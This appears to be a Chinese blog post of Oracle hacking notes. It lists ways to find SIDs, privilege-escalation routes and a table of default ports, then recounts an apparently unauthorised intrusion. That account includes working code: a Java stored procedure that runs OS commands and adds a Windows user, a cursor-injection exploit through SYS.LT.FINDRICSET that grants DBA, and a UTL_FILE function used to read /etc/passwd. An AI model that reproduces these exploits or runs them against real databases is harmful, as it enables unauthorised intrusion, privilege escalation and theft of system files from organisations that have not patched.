hacking oracle笔记

###author:hiphop###
###qq:70381908###

为什么要关注 Oracle ?
因为Oracle 被大量企业所使用,有许多目标可以选择来渗透
许多企业都没有更新且有潜在的方险!
提权非常简单,容易拿到shell!!

读了blackhat paper 让我开始来研究Oracle
因为他只讲到一小部份 真正安全问题还有很广的
只是国内好像很少挖掘
因为遇到的环境不多
但是阿 Oracle 是 free download 呵呵
付费才可以upgrade

一般连接 Oracle 需要以下几个条件:
IP
PORT
SID
username/password

The Oracle listener default port is 1521
generally in the 1521-1540 range
扫描刺探不会跟你说用什么版本但新版的nmap 可以取得到一些,使用TNS packet可以解决这个问题
TNS packet 可以了解 oracle 版本
SID 刺探方式:
1.TNS listener directly
2.brute force for default sid
3.query other component 可能包含有SID

u/p 破解

提权方法:
提權 1 java function
Win32Exec
提權2 smbrelay
Run OS commands via sql injection in web applications
Run OS commands via create table
Run OS commands via dbms scheduler
Run OS commands via PL/SQL and Extproc
Run OS commands via Java
Run OS commands via Oracle Text
Run OS commands via PL/SQL Native (9i)
Run OS commands via PL/SQL Native (10g / 11g)
Run OS commands via alter system set events

还会陆续增加!!
此文只是我的research 的小笔记

另外介绍一款工具 可以做到部份唷 py写的
download: http://inguma.sourceforge.net/
demo:http://inguma.sourceforge.net/text/inguma_text.html


注:
Oracle default port list
Oracle HTTP Server listen port / Oracle HTTP Server port80Oracle Application ServerEdit httpd.conf and restart OHS
Oracle Internet Directory(non-SSL)389Oracle Application Server 
Oracle HTTP Server SSL port443Oracle Application ServerEdit httpd.conf and restart OHS
Oracle Internet Directory(SSL)636Oracle Application Server 
Oracle Net Listener / Enterprise Manager Repository port1521Oracle Application Server / Oracle DatabaseEdit listener.ora and restart listener
Oracle Net Listener1526Oracle DatabaseEdit listener.ora and restart listener
Oracle Names1575Oracle DatabaseEdit names.ora and restart names server
Oracle Connection Manager (CMAN)1630Oracle Connection ManagerEdit cman.ora and restart Connection Manager
Oracle JDBC for Rdb Thin Server1701Oracle Rdb 
Oracle Intelligent Agent1748Oracle Application Serversnmp_rw.ora
Oracle Intelligent Agent1754Oracle Application Serversnmp_rw.ora
Oracle Intelligent Agent1808Oracle Application Serversnmp_rw.ora
Oracle Intelligent Agent1809Oracle Application Serversnmp_rw.ora
Enterprise Manager Servlet port SSL1810Oracle Enterprise Manager 
Oracle Connection Manager Admin (CMAN)1830Oracle Connection Manager (CMAN)Edit cman.ora and restart Connection Manager
Enterprise ManagerAgent port1831Oracle Enterprise Manager 
Enterprise Manager  RMI port1850Oracle Enterprise Manager 
Oracle XMLDB FTP Port2100Oracle Databasechange dbms_xdb.cfg_update
Oracle GIOP IIOP2481Oracle DatabaseEdit listener.ora/init.ora and restart listener/database
Oracle GIOP IIOP for SSL2482Oracle DatabaseEdit listener.ora/init.ora and restart listener/database
Oracle OC4J RMI3201Oracle Application Server 
Oracle OC4J AJP3301Oracle Application Server 
Enterprise Manager Reporting port3339Oracle Application ServerEdit oem_webstage/oem.conf and restart OHS
Oracle OC4J IIOP3401Oracle Application Server 
Oracle OC4J IIOPS13501Oracle Application Server 
Oracle OC4J IIOPS23601Oracle Application Server 
Oracle OC4J JMS3701Oracle Application Server 
Oracle9iAS Web Cache Admin port4000Oracle Application ServerWebcache Admin GUI or webcache.xml
Oracle9iAS Web Cache Invalidation port4001Oracle Application ServerWebcache Admin GUI or webcache.xml
Oracle9iAS Web Cache Statistics port4002Oracle Application ServerWebcache Admin GUI or webcache.xml
Oracle Internet Directory(SSL)4031Oracle Application Server 
Oracle Internet Directory(non-SSL)4032Oracle Application Server 
OracleAS Certificate Authority (OCA) - Server Authentication4400Oracle Application Server 
OracleAS Certificate Authority (OCA) - Mutual Authentication4401Oracle Application Server 
Oracle HTTP Server SSL  port4443Oracle Application ServerEdit httpd.conf and restart OHS
Oracle9iAS Web Cache HTTP Listen(SSL) port4444Oracle Application ServerWebcache Admin GUI or webcache.xml
Oracle TimesTen4662Oracle TimesTen 
Oracle TimesTen4758Oracle TimesTen 
Oracle TimesTen4759Oracle TimesTen 
Oracle TimesTen4761Oracle TimesTen 
Oracle TimesTen4764Oracle TimesTen 
Oracle TimesTen4766Oracle TimesTen 
Oracle TimesTen4767Oracle TimesTen 
Oracle Enterprise Manager Web Console5500Oracle Enterprise Manager Web 
iSQLPlus 10g5560Oracle i*SQLPlus 
iSQLPlus 10g5580Oracle i*SQLPlus RMI Port 
Oracle Notification Service request port6003Oracle Application Server 
Oracle Notification Service local port6100Oracle Application Server 
Oracle Notification Service remote port6200Oracle Application Server 
Oracle9iAS Clickstream Collector Agent6668Oracle Application Server 
Java Object Cache port7000Oracle Application Server 
DCM Java Object Cache port7100Oracle Application Server 
Oracle HTTP Server Diagnostic Port7200Oracle Application Server 
Oracle HTTP Server Port Tunneling7501Oracle Application Server 
Oracle HTTP Server listen port / Oracle HTTP Server port7777Oracle Application ServerEdit httpd.conf and restart OHS
Oracle9iAS Web Cache HTTP Listen(non-SSL) port7779Oracle Application ServerWebcache Admin GUI or webcache.xml
Oracle HTTP Server Jserv port8007Oracle Application Server 
OC4J Forms / Reports Instance8888Oracle Developer Suitechange dbms_xdb.cfg_update
OC4J Forms / Reports Instance8889Oracle Developer Suite 
Oracle Forms Server 6 / 6i9000Oracle Application Server 
Oracle SOAP Server9998Oracle Application Server 
OS Agent14000Oracle Application Server 
Oracle Times Ten15000Oracle Times Ten 
Oracle Times Ten15002Oracle Times Ten 
Oracle Times Ten15004Oracle Times Ten 
Log Loader44000Oracle Enterprise Manager 

这是两年前的一篇笔记。内容有删减。

先是通过某个邪恶的方法连接了oracle服务器......(过程略)


很快便连接上oracle服务器,此时发现:
1.连接后不是dba权限
2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限
3.运行SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual 后发现oracle服务器不能连接网络。


幸运的是,
运行
create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;

成功!这个用户具有create proceduce权限。

此时马上想到创建java扩展执行命令:

create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"/n";myReader.close();return str;} catch (Exception e){return e.toString();}}}


begin dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' );end;

create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name 'LinxUtil.runCMD(java.lang.String) return String'

select  * from all_objects where  object_name like '%LINX%'
grant all on LinxRunCMD to public
select  LinxRunCMD('cmd /c net user linx /add') from dual


但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!
还好,我们还有UTL库可以利用:

create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
fHandler UTL_FILE.FILE_TYPE;
buf      varchar2(4000);
output      varchar2(8000);
BEGIN
fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');
loop  
begin  
utl_file.get_line(fHandler,buf);  
DBMS_OUTPUT.PUT_LINE('Cursor: '||buf);
exception    
when   no_data_found   then   exit;  
end;  
output := output||buf||chr(10);
end   loop;  
UTL_FILE.FCLOSE(fHandler);
return output;
END;


UTL_FILE_DIR需要先用:

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';

指定目录。但运行后发现没有权限。只好想办法提权。


***************游标注射***************

老外写了N个pdf介绍这技术,我精简了代码:


DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO linxlinx_current_db_user'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
BEGIN SYS.LT.FINDRICSET('.''||dbms_sql.execute(    '||MYC||'      )||'''')--','x'); END;
raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);   
END;


运行后重新连接就有dba权限了,简单吧......


现在可以读取文件了:


CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
select LinxUTLReadfile('passwd') from dual


后面就简单了,不写了。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值